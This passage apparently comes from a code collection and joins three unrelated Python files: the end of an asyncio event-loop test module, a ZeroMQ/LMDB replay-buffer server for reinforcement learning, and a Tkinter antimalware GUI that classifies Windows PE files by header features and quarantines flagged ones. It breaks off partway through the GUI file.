        finally:
            asyncio.set_event_loop_policy(old_policy)
            if loop is not None:
                loop.close()

        with self.assertRaisesRegex(RuntimeError, 'no running'):
            self.assertIs(asyncio.get_running_loop(), None)

        self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
    """Run GetEventLoopTestsMixin against the pure-Python implementations."""

    _get_running_loop_impl = events._py__get_running_loop
    _set_running_loop_impl = events._py__set_running_loop
    get_running_loop_impl = events._py_get_running_loop
    get_event_loop_impl = events._py_get_event_loop
try:
    import _asyncio  # NoQA
except ImportError:
    # C accelerator not available: only the pure-Python paths are tested.
    pass
else:
    class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
        """Run GetEventLoopTestsMixin against the C-accelerated implementations."""

        _get_running_loop_impl = events._c__get_running_loop
        _set_running_loop_impl = events._c__set_running_loop
        get_running_loop_impl = events._c_get_running_loop
        get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
    """Tests for the Server object returned by loop.create_server()."""

    def test_get_loop(self):
        loop = asyncio.new_event_loop()
        self.addCleanup(loop.close)

        protocol = MyProto(loop)
        server = loop.run_until_complete(
            loop.create_server(lambda: protocol, '0.0.0.0', 0))
        self.assertEqual(server.get_loop(), loop)

        server.close()
        loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
    """The AbstractServer base class must not implement its API."""

    def test_close(self):
        server = events.AbstractServer()
        with self.assertRaises(NotImplementedError):
            server.close()

    def test_wait_closed(self):
        loop = asyncio.new_event_loop()
        self.addCleanup(loop.close)
        server = events.AbstractServer()
        with self.assertRaises(NotImplementedError):
            loop.run_until_complete(server.wait_closed())

    def test_get_loop(self):
        server = events.AbstractServer()
        with self.assertRaises(NotImplementedError):
            server.get_loop()
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
|
main_loop.py | import copy
import multiprocessing as mp
import os
import shutil
import signal
import sys
import tempfile
import threading
import urllib.parse
import zmq
from loguru import logger
from .sampler_loop import sampler_loop
from ..cache_policy import FIFOPolicy
from ..sampler import PERSampler
from ..utils import ZMQ_DEFAULT_HWM, get_ipc_addr, get_local_ip, get_tcp_addr, init_lmdb
from ..utils.pack import deserialize, serialize
def append_loop(in_addr, sampler_addr, lmdb_path, cache_policy, capacity):
    """Receive (data, weights) batches, write them to lmdb, and forward
    the assigned indices to the sampler processes.

    Runs forever in its own process; exits silently on KeyboardInterrupt.
    """
    ctx = zmq.Context.instance(4)
    ctx.setsockopt(zmq.LINGER, 0)
    in_sock = ctx.socket(zmq.PULL)
    in_sock.set_hwm(ZMQ_DEFAULT_HWM)
    in_sock.bind(in_addr)
    sampler_sock = ctx.socket(zmq.PUSH)
    sampler_sock.set_hwm(ZMQ_DEFAULT_HWM)
    sampler_sock.connect(sampler_addr)
    # lmdb is created lazily: the map size depends on the first sample.
    lmdb_env = None
    step_counter = 0
    busy_counter = 0
    try:
        while True:
            step_counter += 1
            # A message already pending means we are falling behind; warn
            # when that happens on >70% of the last >=100 iterations.
            if in_sock.poll(timeout=0, flags=zmq.POLLIN):
                busy_counter += 1
                if step_counter >= 100 and busy_counter / step_counter > 0.7:
                    logger.warning(f"append loop ({busy_counter}/{step_counter})")
                    busy_counter = 0
                    step_counter = 0
            req_frame = in_sock.recv(copy=False)
            data, weights = deserialize(req_frame.buffer)
            # The cache policy chooses which slots the new samples occupy
            # (and thereby which old samples get evicted).
            indices = cache_policy.get_indices(len(weights))
            if lmdb_env is None:
                # 1.5x headroom over a full buffer of first-sample-sized
                # entries.  NOTE(review): assumes all samples are roughly
                # the same byte size as data[0] -- confirm for variable
                # shapes.
                map_size = 1.5 * capacity * memoryview(data[0]).nbytes
                lmdb_env = init_lmdb(lmdb_path, map_size)
                logger.info(
                    f"lmdb created, map size: {map_size / 1024 / 1024 / 1024:.2f} GB"
                )
            with lmdb_env.begin(write=True) as txn:
                for i, idx in enumerate(indices):
                    txn.put(str(idx).encode(), data[i])
            # NOTE(review): the trailing False presumably marks this as new
            # data rather than a priority update -- verify in sampler_loop.
            sampler_sock.send(serialize([indices, weights, False]))
    except KeyboardInterrupt:
        # silent exit
        pass
def meta_loop(meta_addr, config):
    """Serve the buffer configuration as JSON over a REP socket, forever."""
    cfg = copy.deepcopy(config)
    # Sampler classes are not JSON-serializable; ship their names instead.
    for sampler in cfg["sampler_info"].values():
        sampler["sampler_cls"] = sampler["sampler_cls"].__name__

    context = zmq.Context.instance()
    context.setsockopt(zmq.LINGER, 0)
    rep_sock = context.socket(zmq.REP)
    rep_sock.set_hwm(ZMQ_DEFAULT_HWM)
    rep_sock.bind(meta_addr)

    while True:
        # Request content is irrelevant; every request gets the config.
        rep_sock.recv()
        rep_sock.send_json(cfg)
def update_proxy_loop(in_addr, out_addr):
    """Forward messages from a bound PULL socket to a bound PUB socket."""
    context = zmq.Context.instance()
    context.setsockopt(zmq.LINGER, 0)

    pull_sock = context.socket(zmq.PULL)
    pull_sock.set_hwm(ZMQ_DEFAULT_HWM)
    pull_sock.bind(in_addr)

    pub_sock = context.socket(zmq.PUB)
    pub_sock.bind(out_addr)

    # Blocks forever, shuttling messages between the two sockets.
    zmq.proxy(pull_sock, pub_sock)
class SignalHandler:
    """Terminate child processes and clean up temp files on SIGINT/SIGTERM."""

    def __init__(self, proc_list, temp_folder):
        # proc_list is shared with the caller, which keeps appending
        # processes after this handler is registered.
        self.proc_list = proc_list
        self.temp_folder = temp_folder
        self.exit_flag = False  # guards against re-entrant signal delivery

    def on_signal(self, signum, *_):
        """Signal handler: terminate children, remove temp folder, exit."""
        if self.exit_flag:
            return
        self.exit_flag = True
        # Fixed typo in the log message ("recieved" -> "received").
        logger.info(f"signal {signum} received, terminating...")
        for proc in self.proc_list:
            proc.terminate()
            proc.join()
        shutil.rmtree(self.temp_folder)
        logger.info("replay buffer terminated")
        sys.exit(signum)
def main_loop(capacity, batch_size, meta_addr=None, samplers=None, cache_policy=None):
    """Start the replay-buffer server: one append process, sampler
    processes, plus meta and update-proxy threads.  Blocks until killed
    by a signal (see SignalHandler).

    capacity: maximum number of transitions kept in the buffer.
    batch_size: size of the batches produced by the samplers.
    meta_addr: optional tcp address to serve the config on; a free port
        on the local IP is picked when None.
    samplers: optional list of sampler specs (keys: "sampler_cls",
        "num_procs", "sample_start", "kwargs", "topic"); defaults to a
        single PERSampler.
    cache_policy: slot-eviction policy instance; defaults to FIFOPolicy.
    """
    mp_ctx = mp.get_context("spawn")
    # default args
    if cache_policy is None:
        cache_policy = FIFOPolicy(capacity)
    if samplers is None:
        samplers = [
            {
                "sampler_cls": PERSampler,
                "num_procs": 1,
                "sample_start": 1000,
            }
        ]
    if meta_addr is None:
        host = get_local_ip()
    else:
        host = urllib.parse.urlparse(meta_addr).hostname
    # Prefer shared memory for IPC sockets and lmdb where available.
    if os.name == "nt":
        temp_dir = None
    else:
        temp_dir = "/dev/shm"
    temp_folder = tempfile.mkdtemp(prefix="reth_buffer", dir=temp_dir)
    # normalize sampler param
    sampler_info = {}
    for item in samplers:
        topic = item.get("topic", "default")
        assert topic not in sampler_info
        num_procs = item.get("num_procs", 1)
        kwargs = item.get("kwargs", {})
        kwargs["capacity"] = capacity
        # Never start sampling before at least one full batch exists.
        sample_start = item.get("sample_start", 1000)
        sample_start = max(sample_start, batch_size)
        info = {
            "topic": topic,
            "sampler_cls": item["sampler_cls"],
            "num_procs": num_procs,
            "kwargs": kwargs,
            "addrs": [
                get_ipc_addr(temp_folder, f"sampler-{topic}-{idx}")
                for idx in range(num_procs)
            ],
            "sample_start": sample_start,
            "batch_size": batch_size,
        }
        sampler_info[topic] = info
    # generate addrs
    if meta_addr is None:
        meta_addr = get_tcp_addr(host)
    append_addr = get_tcp_addr(host)
    update_addr = get_ipc_addr(temp_folder, "update")
    _update_proxy_out_addr = get_ipc_addr(temp_folder, "update-proxy-out")
    lmdb_path = os.path.join(temp_folder, "lmdb")
    os.makedirs(lmdb_path, exist_ok=True)
    config = {
        "capacity": capacity,
        "batch_size": batch_size,
        "lmdb_path": lmdb_path,
        "meta_addr": meta_addr,
        "append_addr": append_addr,
        "update_addr": update_addr,
        "sampler_info": sampler_info,
    }
    # start processes
    created_procs = []
    # The handler keeps a reference to created_procs, so processes that
    # are appended below are still terminated on signal.
    signal_handler = SignalHandler(created_procs, temp_folder)
    signal.signal(signal.SIGINT, signal_handler.on_signal)
    signal.signal(signal.SIGTERM, signal_handler.on_signal)
    # main proc threads
    meta_thread = threading.Thread(
        target=meta_loop, args=(meta_addr, config), daemon=True
    )
    meta_thread.start()
    update_proxy_thread = threading.Thread(
        target=update_proxy_loop,
        args=(update_addr, _update_proxy_out_addr),
        daemon=True,
    )
    update_proxy_thread.start()
    # append
    append_proc = mp_ctx.Process(
        target=append_loop,
        args=(append_addr, update_addr, lmdb_path, cache_policy, capacity),
    )
    append_proc.start()
    created_procs.append(append_proc)
    # sampler
    for topic, info in sampler_info.items():
        for idx in range(info["num_procs"]):
            sampler_proc = mp_ctx.Process(
                target=sampler_loop,
                args=(_update_proxy_out_addr, info, idx),
            )
            sampler_proc.start()
            created_procs.append(sampler_proc)
    # Both threads loop forever; these joins block until a signal kills
    # the process via SignalHandler.on_signal.
    meta_thread.join()
    update_proxy_thread.join()
|
MLAntiMalware.py | import pefile
import os
import array
import math
import pickle
import joblib
import sys
from threading import *
from tkinter import *
from tkinter.filedialog import askopenfilename
import tkinter, tkinter.scrolledtext
import sys
import urllib.request
import glob
import time
import hashlib
import quarantaene
os_name = sys.platform
# Files currently held in quarantine (populated by quarantine()).
terminations = []
# NOTE: sys.platform is "win32" on Windows but "darwin" on macOS, so the
# old check `"win" in os_name` wrongly matched macOS and used Windows
# path separators there; startswith("win") matches Windows only.
if os_name.startswith("win"):
    if not os.path.exists("MLAnti\\Quarantine\\"):
        os.makedirs("MLAnti\\Quarantine\\")
    quarantine_folder = "MLAnti\\Quarantine\\*"
    file_to_quarantine = "MLAnti\\Quarantine\\"
    transfer = os.getcwd() + "\\Transfer\\*"
    classifier = os.getcwd() + "\\Classifier"
else:
    if not os.path.exists("MLAnti/Quarantine/"):
        os.makedirs("MLAnti/Quarantine/")
    quarantine_folder = "MLAnti/Quarantine/*"
    file_to_quarantine = "MLAnti/Quarantine/"
    transfer = os.getcwd() + "/Transfer/*"
    classifier = os.getcwd() + "/Classifier"

# Tkinter widget handles, shared across the UI callbacks below.
main = None
update_button = None
scan_button = None
quit_button = None
b_delete = None
b_delete_all = None
b_restore = None
b_restore_all = None
b_add_file = None
text_box = None
li = None
file = None
def get_entropy(data):
    """Return the Shannon entropy of *data* in bits per symbol.

    Accepts bytes (or a str of single characters); an empty input has
    entropy 0.0 by convention.
    """
    if not data:
        return 0.0
    counts = array.array('L', [0] * 256)
    for symbol in data:
        counts[symbol if isinstance(symbol, int) else ord(symbol)] += 1
    total = float(len(data))
    # H = -sum(p * log2(p)) over the symbols that actually occur.
    return -sum((c / total) * math.log(c / total, 2) for c in counts if c)
def get_resources(pe):
    """Extract [entropy, size] pairs for every resource in a PE file.

    Returns an empty list when the file has no resource directory; if
    traversal fails part-way, the resources collected so far are returned.
    """
    resources = []
    if not hasattr(pe, 'DIRECTORY_ENTRY_RESOURCE'):
        return resources
    try:
        for res_type in pe.DIRECTORY_ENTRY_RESOURCE.entries:
            if not hasattr(res_type, 'directory'):
                continue
            for res_id in res_type.directory.entries:
                if not hasattr(res_id, 'directory'):
                    continue
                for res_lang in res_id.directory.entries:
                    size = res_lang.data.struct.Size
                    payload = pe.get_data(
                        res_lang.data.struct.OffsetToData, size)
                    resources.append([get_entropy(payload), size])
    except Exception:
        return resources
    return resources
def get_version_info(pe):
    """Return the PE version resource as a flat dict of name -> value.

    NOTE(review): assumes pefile's legacy flat FileInfo layout
    (pe.FileInfo as a list of entries with .Key/.StringTable/.Var);
    newer pefile versions nest this one level deeper -- confirm the
    installed pefile version matches.
    """
    res = {}
    for fileinfo in pe.FileInfo:
        if fileinfo.Key == 'StringFileInfo':
            for st in fileinfo.StringTable:
                for entry in st.entries.items():
                    res[entry[0]] = entry[1]
        if fileinfo.Key == 'VarFileInfo':
            for var in fileinfo.Var:
                res[var.entry.items()[0][0]] = var.entry.items()[0][1]
    if hasattr(pe, 'VS_FIXEDFILEINFO'):
        # Fixed-length header fields of the version resource.
        res['flags'] = pe.VS_FIXEDFILEINFO.FileFlags
        res['os'] = pe.VS_FIXEDFILEINFO.FileOS
        res['type'] = pe.VS_FIXEDFILEINFO.FileType
        res['file_version'] = pe.VS_FIXEDFILEINFO.FileVersionLS
        res['product_version'] = pe.VS_FIXEDFILEINFO.ProductVersionLS
        res['signature'] = pe.VS_FIXEDFILEINFO.Signature
        res['struct_version'] = pe.VS_FIXEDFILEINFO.StrucVersion
    return res
def extract_infos(fpath):
    """Extract the PE-header feature vector for *fpath*.

    Returns a dict mapping feature name -> numeric value, or {} when the
    file is not a valid PE.  The key names are the feature names the
    classifier was trained on and must not be renamed (including the
    historical 'SectionMaxVirtualsize' spelling).
    """
    try:
        pe = pefile.PE(fpath)
    except pefile.PEFormatError:
        return {}
    res = {}
    # FILE_HEADER / OPTIONAL_HEADER scalar fields.
    res['Machine'] = pe.FILE_HEADER.Machine
    res['SizeOfOptionalHeader'] = pe.FILE_HEADER.SizeOfOptionalHeader
    res['Characteristics'] = pe.FILE_HEADER.Characteristics
    res['MajorLinkerVersion'] = pe.OPTIONAL_HEADER.MajorLinkerVersion
    res['MinorLinkerVersion'] = pe.OPTIONAL_HEADER.MinorLinkerVersion
    res['SizeOfCode'] = pe.OPTIONAL_HEADER.SizeOfCode
    res['SizeOfInitializedData'] = pe.OPTIONAL_HEADER.SizeOfInitializedData
    res['SizeOfUninitializedData'] = pe.OPTIONAL_HEADER.SizeOfUninitializedData
    res['AddressOfEntryPoint'] = pe.OPTIONAL_HEADER.AddressOfEntryPoint
    res['BaseOfCode'] = pe.OPTIONAL_HEADER.BaseOfCode
    try:
        res['BaseOfData'] = pe.OPTIONAL_HEADER.BaseOfData
    except AttributeError:
        # PE32+ (64-bit) images have no BaseOfData field.
        res['BaseOfData'] = 0
    res['ImageBase'] = pe.OPTIONAL_HEADER.ImageBase
    res['SectionAlignment'] = pe.OPTIONAL_HEADER.SectionAlignment
    res['FileAlignment'] = pe.OPTIONAL_HEADER.FileAlignment
    res['MajorOperatingSystemVersion'] = pe.OPTIONAL_HEADER.MajorOperatingSystemVersion
    res['MinorOperatingSystemVersion'] = pe.OPTIONAL_HEADER.MinorOperatingSystemVersion
    res['MajorImageVersion'] = pe.OPTIONAL_HEADER.MajorImageVersion
    res['MinorImageVersion'] = pe.OPTIONAL_HEADER.MinorImageVersion
    res['MajorSubsystemVersion'] = pe.OPTIONAL_HEADER.MajorSubsystemVersion
    res['MinorSubsystemVersion'] = pe.OPTIONAL_HEADER.MinorSubsystemVersion
    res['SizeOfImage'] = pe.OPTIONAL_HEADER.SizeOfImage
    res['SizeOfHeaders'] = pe.OPTIONAL_HEADER.SizeOfHeaders
    res['CheckSum'] = pe.OPTIONAL_HEADER.CheckSum
    res['Subsystem'] = pe.OPTIONAL_HEADER.Subsystem
    res['DllCharacteristics'] = pe.OPTIONAL_HEADER.DllCharacteristics
    res['SizeOfStackReserve'] = pe.OPTIONAL_HEADER.SizeOfStackReserve
    res['SizeOfStackCommit'] = pe.OPTIONAL_HEADER.SizeOfStackCommit
    res['SizeOfHeapReserve'] = pe.OPTIONAL_HEADER.SizeOfHeapReserve
    res['SizeOfHeapCommit'] = pe.OPTIONAL_HEADER.SizeOfHeapCommit
    res['LoaderFlags'] = pe.OPTIONAL_HEADER.LoaderFlags
    res['NumberOfRvaAndSizes'] = pe.OPTIONAL_HEADER.NumberOfRvaAndSizes
    # Sections
    res['SectionsNb'] = len(pe.sections)
    entropy = list(map(lambda x: x.get_entropy(), pe.sections))
    res['SectionsMeanEntropy'] = sum(entropy) / float(len(entropy))
    res['SectionsMinEntropy'] = min(entropy)
    res['SectionsMaxEntropy'] = max(entropy)
    raw_sizes = list(map(lambda x: x.SizeOfRawData, pe.sections))
    res['SectionsMeanRawsize'] = sum(raw_sizes) / float(len(raw_sizes))
    res['SectionsMinRawsize'] = min(raw_sizes)
    res['SectionsMaxRawsize'] = max(raw_sizes)
    virtual_sizes = list(map(lambda x: x.Misc_VirtualSize, pe.sections))
    res['SectionsMeanVirtualsize'] = sum(
        virtual_sizes) / float(len(virtual_sizes))
    res['SectionsMinVirtualsize'] = min(virtual_sizes)
    # NOTE(review): key is missing the plural 's' ('SectionMaxVirtualsize');
    # kept as-is because the trained model expects this exact name.
    res['SectionMaxVirtualsize'] = max(virtual_sizes)
    # Imports
    try:
        res['ImportsNbDLL'] = len(pe.DIRECTORY_ENTRY_IMPORT)
        imports = sum([x.imports for x in pe.DIRECTORY_ENTRY_IMPORT], [])
        res['ImportsNb'] = len(imports)
        # Imports referenced by ordinal only (no symbol name).
        res['ImportsNbOrdinal'] = len(
            list(filter(lambda x: x.name is None, imports)))
    except AttributeError:
        # No import table.
        res['ImportsNbDLL'] = 0
        res['ImportsNb'] = 0
        res['ImportsNbOrdinal'] = 0
    # Exports
    try:
        res['ExportNb'] = len(pe.DIRECTORY_ENTRY_EXPORT.symbols)
    except AttributeError:
        # No export
        res['ExportNb'] = 0
    # Resources
    resources = get_resources(pe)
    res['ResourcesNb'] = len(resources)
    if len(resources) > 0:
        entropy = list(map(lambda x: x[0], resources))
        res['ResourcesMeanEntropy'] = sum(entropy) / float(len(entropy))
        res['ResourcesMinEntropy'] = min(entropy)
        res['ResourcesMaxEntropy'] = max(entropy)
        sizes = list(map(lambda x: x[1], resources))
        res['ResourcesMeanSize'] = sum(sizes) / float(len(sizes))
        res['ResourcesMinSize'] = min(sizes)
        res['ResourcesMaxSize'] = max(sizes)
    else:
        # NOTE(review): ResourcesNb is redundantly reassigned (already 0
        # from above); harmless, kept as-is.
        res['ResourcesNb'] = 0
        res['ResourcesMeanEntropy'] = 0
        res['ResourcesMinEntropy'] = 0
        res['ResourcesMaxEntropy'] = 0
        res['ResourcesMeanSize'] = 0
        res['ResourcesMinSize'] = 0
        res['ResourcesMaxSize'] = 0
    # Load configuration size
    try:
        res['LoadConfigurationSize'] = pe.DIRECTORY_ENTRY_LOAD_CONFIG.struct.Size
    except AttributeError:
        res['LoadConfigurationSize'] = 0
    # Version configuration size
    try:
        version_infos = get_version_info(pe)
        res['VersionInformationSize'] = len(version_infos.keys())
    except AttributeError:
        res['VersionInformationSize'] = 0
    return res
def quarantine():
    """Refresh the quarantine list box and wire up the action buttons."""
    global text_box
    global terminations
    global li
    global b_delete
    global b_delete_all
    global b_restore
    global b_restore_all
    global b_add_file
    # Clear the current list box content.
    # NOTE(review): len() of the entry text is used as a delete index,
    # which only works by accident of Tkinter's index coercion -- verify.
    k = 0
    while True:
        tmp = len(li.get(k))
        if tmp == 0:
            break
        else:
            li.delete(0, tmp)
            k += 1
            li.update()
    terminations = glob.glob(quarantine_folder)
    if terminations == []:
        text_box.insert(END, "[ + ] No files in quarantine\n", "positive")
        text_box.tag_config('positive', foreground="green")
        text_box.see(END)
        text_box.update()
    else:
        text_box.insert(END, "[ + ] Files in quarantine:\n", "positive")
        text_box.tag_config('positive', foreground="green")
        text_box.see(END)
        text_box.update()
        for i in terminations:
            text_box.insert(END, "[ * ] " + i + "\n", "info")
            text_box.tag_config("info", background = "red")
            text_box.see(END)
            text_box.update()
            li.insert(END, i)
            li.update()
    # (Re)bind the quarantine-management buttons to the action dispatcher.
    b_delete_all["command"] =lambda:button_action_handler("delete_all")
    b_delete["command"] = lambda:button_action_handler("delete")
    b_restore["command"] = lambda:button_action_handler("restore")
    b_restore_all["command"] = lambda:button_action_handler("restore_all")
    b_add_file["command"] = lambda:button_action_handler("add_file")
def delete(file, ALL):
    """Delete quarantined file(s) from disk and refresh the listbox.

    file -- path of the single entry to delete (ignored when ALL == 1).
    ALL  -- 1 deletes every file in ``terminations``; 0 deletes only *file*.
    """
    global li
    global text_box
    global terminations
    if len(terminations) != 0:
        if ALL == 1:
            for i in range(len(terminations)):
                os.remove(terminations[i])
                text_box.insert(END, "[ + ] Deletion successful: \n" + terminations[i] + "\n", "positive")
                text_box.tag_config("positive", foreground="green")
                text_box.see(END)
                text_box.update()
                # NOTE(review): passes the path's string length as the
                # listbox end index -- likely meant li.delete(0, END); the
                # re-glob below repopulates the list anyway. Confirm.
                li.delete(0, len(terminations[i]))
                li.update()
        elif ALL == 0:
            os.remove(file)
            # NOTE(review): same suspicious index usage (len(file) as end index).
            li.delete(ACTIVE, len(file))
            li.update()
            text_box.insert(END, "[ + ] Deletion successful:\n" + file + "\n", "positive")
            text_box.tag_config("positive", foreground="green")
            text_box.see(END)
            text_box.update()
        # Re-scan the quarantine folder and rebuild the listbox contents.
        terminations = glob.glob(quarantine_folder)
        for i in terminations:
            li.insert(END, i)
            li.update()
    else:
        text_box.insert(END, "[ - ] Unable to locate any files\n", "negative")
        text_box.tag_config("negative", foreground="red")
        text_box.see(END)
        text_box.update()
def restore(file, ALL):
    """Restore quarantined file(s) by base64-decoding them back in place.

    file -- path of the single entry to restore (ignored when ALL == 1).
    ALL  -- 1 restores every file in ``terminations``; 0 restores only *file*.
    """
    global li
    global text_box
    global terminations
    if len(terminations) != 0:
        if ALL == 1:
            for i in range(len(terminations)):
                # quarantaene.decode_base64 is the project helper that
                # reverses encode_base64 (module not visible here).
                quarantaene.decode_base64(terminations[i])
                text_box.insert(END, "[ + ] Successfully restored\n" + terminations[i] + "\n", 'positive')
                text_box.tag_config('positive', foreground="green")
                text_box.see(END)
                text_box.update()
                # NOTE(review): string length used as listbox end index --
                # same pattern as delete(); the re-glob below rebuilds the
                # list regardless. Confirm intent.
                li.delete(0, len(terminations[i]))
                li.update()
        elif ALL == 0:
            quarantaene.decode_base64(file)
            li.delete(ACTIVE, len(file))
            text_box.insert(END, "[ + ] Successfully restored\n" + file + "\n", "positive")
            text_box.tag_config("positive", foreground="green")
            text_box.see(END)
            text_box.update()
        # Re-scan the quarantine folder and rebuild the listbox contents.
        terminations = glob.glob(quarantine_folder)
        for i in terminations:
            li.insert(END, i)
            li.update()
    else:
        text_box.insert(END, "[ - ] Unable to locate any files\n", "negative")
        text_box.tag_config("negative", foreground="red")
        text_box.see(END)
        text_box.update()
def add_file_to_quarantine():
    """Prompt for a file, move it into quarantine (base64-encoded), and
    rebuild the quarantine listbox."""
    global li
    global terminations
    # NOTE(review): a cancelled dialog returns "" -- encode_base64 would
    # then receive an empty path; verify the helper tolerates that.
    file = askopenfilename()
    quarantaene.encode_base64(file, file_to_quarantine)
    text_box.insert(END, "[ + ] Moved to quarantine:\n" + file + "\n", "positive")
    text_box.tag_config("positive", foreground="green")
    text_box.see(END)
    text_box.update()
    li.update()
    # Clear the listbox (same entry-walking idiom as quarantine();
    # see the review note there about the li.delete end index).
    k = 0
    while True:
        tmp = len(li.get(k))
        if tmp == 0:
            break
        else:
            li.delete(0, tmp)
            k += 1
    li.update()
    # Re-scan the folder and repopulate the listbox.
    terminations = glob.glob(quarantine_folder)
    for i in terminations:
        li.insert(END, i)
        li.update()
def automatic_scan(path):
    """Scan *path* with the trained classifier; on a malware verdict the
    file is moved into quarantine.

    Mirrors scan(), but takes the target path as an argument instead of
    prompting the user. All progress/results are written to the GUI
    text box; returns None early if hashing the file fails.
    """
    global text_box
    global md5hash
    match = False
    file = path
    start = time.time()
    text_box.insert(END, "[ * ] Scanning " + file + "\n")
    text_box.see(END)
    text_box.update()
    # Load the trained model and the ordered feature list it expects.
    clf = joblib.load(os.path.join(classifier, 'classifier.pkl'))
    # 'with' closes the handle; the original left it open.
    with open(os.path.join(classifier, 'features.pkl'), 'rb') as fh:
        features = pickle.loads(fh.read())
    data = extract_infos(file)
    if not data:
        # extract_infos() yields an empty mapping for non-PE files.
        text_box.insert(END, "[ * ] Not a PE file. " + "\n")
        text_box.see(END)
        text_box.update()
    else:
        # Build the feature vector in the order the model was trained on.
        pe_features = [data[name] for name in features]
        res = clf.predict([pe_features])[0]
        if res == 0:
            match = True
        try:
            # 'with' guarantees the handle is closed even if read()
            # raises (the original leaked it on MemoryError).
            with open(file, "rb") as f:
                content = f.read()
            md5hash = create_md5(content).decode("utf-8")
            text_box.insert(END, "MD5-Hash: " + md5hash + "\n")
            text_box.see(END)
            text_box.update()
        except MemoryError:
            text_box.insert(END, "[ - ] Unable to create MD5-Hash:\n----->MemoryError!\n", 'negative')
            text_box.insert(END, "[ ! ] Only select files under 1 GB\n", "negative")
            text_box.tag_config('negative', foreground="red")
            text_box.see(END)
            text_box.update()
            return None
        except Exception:
            # Broad catch kept deliberately: the GUI must survive
            # unreadable/corrupted files without crashing.
            text_box.insert(END, "[ ! ] Unable to handle problem\n[ ! ] Try again/file might be corrupted\n", "negative")
            text_box.tag_config('negative', foreground="red")
            text_box.see(END)
            text_box.update()
            return None
        text_box.insert(END, "[ * ] Scan duration: {0}\n".format(round(time.time() - start, 2)))
        text_box.see(END)
        text_box.update()
        if match:
            # Verdict 0 == malicious: encode the file into quarantine.
            quarantaene.encode_base64(file, file_to_quarantine)
            text_box.insert(END, "[ ! ] Threat found\n[ ! ] File was moved into quarantine\n", "important")
            text_box.tag_config("important", foreground="red")
            text_box.see(END)
            text_box.update()
        else:
            text_box.insert(END, "[ + ] No threat was found\n", "positive")
            text_box.tag_config("positive", foreground="green")
            text_box.see(END)
            text_box.update()
def scan():
    """Prompt the user for a file and scan it with the trained classifier;
    on a malware verdict the file is moved into quarantine.

    Same pipeline as automatic_scan(), but the target is chosen through a
    file-open dialog. All progress/results go to the GUI text box;
    returns None early if hashing the file fails.
    """
    global text_box
    global md5hash
    match = False
    # NOTE: a cancelled dialog returns "" and will surface through the
    # generic error path below.
    file = askopenfilename()
    start = time.time()
    text_box.insert(END, "[ * ] Scanning " + file + "\n")
    text_box.see(END)
    text_box.update()
    # Load the trained model and the ordered feature list it expects.
    clf = joblib.load(os.path.join(classifier, 'classifier.pkl'))
    # 'with' closes the handle; the original left it open.
    with open(os.path.join(classifier, 'features.pkl'), 'rb') as fh:
        features = pickle.loads(fh.read())
    data = extract_infos(file)
    if not data:
        # extract_infos() yields an empty mapping for non-PE files.
        text_box.insert(END, "[ * ] Not a PE file. " + "\n")
        text_box.see(END)
        text_box.update()
    else:
        # Build the feature vector in the order the model was trained on.
        pe_features = [data[name] for name in features]
        res = clf.predict([pe_features])[0]
        if res == 0:
            match = True
        try:
            # 'with' guarantees the handle is closed even if read()
            # raises (the original leaked it on MemoryError).
            with open(file, "rb") as f:
                content = f.read()
            md5hash = create_md5(content).decode("utf-8")
            text_box.insert(END, "MD5-Hash: " + md5hash + "\n")
            text_box.see(END)
            text_box.update()
        except MemoryError:
            text_box.insert(END, "[ - ] Unable to create MD5-Hash:\n----->MemoryError!\n", 'negative')
            text_box.insert(END, "[ ! ] Only select files under 1 GB\n", "negative")
            text_box.tag_config('negative', foreground="red")
            text_box.see(END)
            text_box.update()
            return None
        except Exception:
            # Broad catch kept deliberately: the GUI must survive
            # unreadable/corrupted files without crashing.
            text_box.insert(END, "[ ! ] Unable to handle problem\n[ ! ] Try again/file might be corrupted\n", "negative")
            text_box.tag_config('negative', foreground="red")
            text_box.see(END)
            text_box.update()
            return None
        text_box.insert(END, "[ * ] Scan duration: {0}\n".format(round(time.time() - start, 2)))
        text_box.see(END)
        text_box.update()
        if match:
            # Verdict 0 == malicious: encode the file into quarantine.
            quarantaene.encode_base64(file, file_to_quarantine)
            text_box.insert(END, "[ ! ] Threat found\n[ ! ] File was moved into quarantine\n", "important")
            text_box.tag_config("important", foreground="red")
            text_box.see(END)
            text_box.update()
        else:
            text_box.insert(END, "[ + ] No threat was found\n", "positive")
            text_box.tag_config("positive", foreground="green")
            text_box.see(END)
            text_box.update()
def create_md5(content):
    """Return the hex MD5 digest of *content* as UTF-8 bytes."""
    return hashlib.md5(content).hexdigest().encode("utf-8")
def update():
    """Handler for the Update button; currently a placeholder that does
    no work (it only declares the shared text box global)."""
    global text_box
def closing():
    """Shut the application down: destroy the Tk root window, then
    terminate the process via sys.exit()."""
    main.destroy()
    sys.exit()
def button_action_handler(s):
    """Route a GUI button press (identified by the string *s*) to its
    worker, each started on a fresh background thread. The quarantine
    button additionally toggles the side-panel widgets."""
    global text_box
    global b_delete
    global b_delete_all
    global b_restore
    global b_restore_all
    global b_add_file
    global li
    # Deferred thread factories: the args (e.g. li.get(ACTIVE)) are only
    # evaluated when the matching action fires, as in the original.
    workers = {
        "delete": lambda: Thread(target=delete, args=(li.get(ACTIVE), 0)),
        "delete_all": lambda: Thread(target=delete, args=(0, 1)),
        "restore": lambda: Thread(target=restore, args=(li.get(ACTIVE), 0)),
        "restore_all": lambda: Thread(target=restore, args=(0, 1)),
        "add_file": lambda: Thread(target=add_file_to_quarantine),
        "details_button": lambda: Thread(target=detailedReport),
        "scan_button": lambda: Thread(target=scan),
        "update_button": lambda: Thread(target=update),
        "quit_button": lambda: Thread(target=closing),
    }
    if s in workers:
        workers[s]().start()
    if s == "quarantine_button":
        # Toggle the quarantine side panel: show it (and refresh its
        # contents) when hidden, hide it when visible.
        if li.winfo_viewable() == 0:
            b_delete.place(x = 605, y = 61)
            b_delete_all.place(x = 605, y = 86)
            b_restore.place(x = 605, y = 111)
            b_restore_all.place(x = 605, y = 136)
            b_add_file.place(x = 605, y = 161)
            li.place(x = 605, y = 0)
            Thread(target=quarantine).start()
        if li.winfo_viewable() == 1:
            b_delete.place_forget()
            b_delete_all.place_forget()
            b_restore.place_forget()
            b_restore_all.place_forget()
            b_add_file.place_forget()
            li.place_forget()
def gui_thread():
    """Build the Tk main window, wire every button through
    button_action_handler, then scan the newest file in the transfer
